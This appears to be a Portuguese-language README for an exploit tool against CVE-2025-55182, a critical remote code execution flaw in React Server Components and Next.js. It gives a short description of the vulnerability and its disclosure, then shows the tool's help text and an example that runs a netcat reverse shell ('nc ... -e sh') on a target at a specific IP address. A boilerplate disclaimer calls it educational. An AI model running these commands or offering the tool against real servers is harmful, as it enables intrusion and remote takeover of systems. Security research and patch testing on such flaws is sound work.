
CVE-2025-55182 Exploit | by infrar3d
Explorado por infrar3d
Uma vulnerabilidade de gravidade crítica 10.0 afetando o uso server-side do React.js, rastreada como CVE-2025-55182 no React.js e CVE-2025-66478 especificamente para o framework Next.js.
Esta vulnerabilidade foi divulgada de forma responsável por Lachlan Davidson em 29 de novembro de 2025 PT para a equipe Meta. A divulgação inicial e o lançamento do patch foram realizados pela React e Vercel em 3 de dezembro de 2025 PT. (Original: https://react2shell.com/)
python3 CVE-2025-55182.py --help
usage: python CVE-2025-55182.py -u <URL> [-c COMMAND]
CVE-2025-55182 - React Server Components RCE Exploit
options:
-h, --help show this help message and exit
-u, --url URL Target URL (required)
-c, --command COMMAND
Command to execute on target (default: id)
Example: python CVE-2025-55182.py -u http://target.com -c "whoami"
python3 CVE-2025-55182.py -u http://154.57.164.73:30507 -c "nc 10.0.2.4 4444 -e sh"
Este software e código de prova de conceito são fornecidos apenas para fins educacionais e de pesquisa.
Você é responsável por obedecer todas as leis aplicáveis. Use de forma ética e responsável.